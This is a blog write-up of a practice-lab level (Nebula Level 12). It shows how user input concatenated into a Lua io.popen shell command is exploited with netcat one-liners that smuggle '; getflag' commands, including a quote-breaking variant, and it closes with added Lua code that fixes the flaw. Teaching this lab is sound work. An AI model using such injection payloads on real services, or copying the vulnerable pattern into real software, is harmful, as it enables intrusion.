blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 12

Problem

  1. User input is used directly as a command-line argument.

Exploit

In this level, the user input is passed directly to a function that executes it as part of a shell command. Thus, the solution is simple: connect to the port, terminate the first command with a ; and pass a command afterwards.

echo '; getflag >/tmp/flag12' | netcat localhost 50001
cat /tmp/flag12

Use cat to see the flag:

cat /tmp/flag12

Lesson / How to fix

  1. Do not trust user input!

In this case, single quotes like the following do not help, because the input can contain a single quote of its own and close the quoted string early:

...
  prog = io.popen("echo '"..password.."' | sha1sum", "r")
...

Exploit:

echo "' ; getflag >/tmp/flag123 ; ' " | netcat localhost 50001

The API of Lua does not provide any good information. Since I’m not a Lua expert either, I again owe you a fix for the problem…
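One possible fix, as an added example that is not from the original post or the level's own code: either quote the input correctly for sh, or keep it out of the command string and send it on stdin. The helper names shell_quote, sha1_quoted and sha1_via_stdin are hypothetical, and the code assumes a POSIX sh and sha1sum on the PATH.

```lua
-- Added example (not from the original post). Assumes POSIX sh and sha1sum.

-- Quote s as one literal word for sh: inside '...' every byte is literal
-- except ' itself, so each ' becomes '\'' (close, escaped quote, reopen).
local function shell_quote(s)
  assert(not s:find("\0", 1, true), "NUL byte cannot be passed to sh")
  return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

-- Fix A: same pipeline as the level, but with the input properly quoted.
-- printf replaces echo so that backslashes and a leading "-n" stay data.
local function sha1_quoted(password)
  local cmd = "printf '%s\\n' " .. shell_quote(password) .. " | sha1sum"
  local prog = assert(io.popen(cmd, "r"))
  local data = prog:read("*a")
  prog:close()
  return data:sub(1, 40)
end

-- Fix B: keep the input out of the command string entirely and send it on
-- stdin. io.popen is one-way, so the digest is collected from a temp file.
local function sha1_via_stdin(password)
  local out = os.tmpname()
  local prog = assert(io.popen("sha1sum > " .. shell_quote(out), "w"))
  prog:write(password, "\n")
  prog:close()
  local f = assert(io.open(out, "r"))
  local data = f:read("*a")
  f:close()
  os.remove(out)
  return data:sub(1, 40)
end

-- The payload from the post is now hashed as data, not executed.
local hostile = "' ; getflag >/tmp/flag123 ; ' "
local a, b = sha1_quoted(hostile), sha1_via_stdin(hostile)
assert(#a == 40 and a:match("^%x+$"), "expected a 40-digit hex digest")
assert(a == b, "both fixes must hash the same bytes")
print(a)
```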

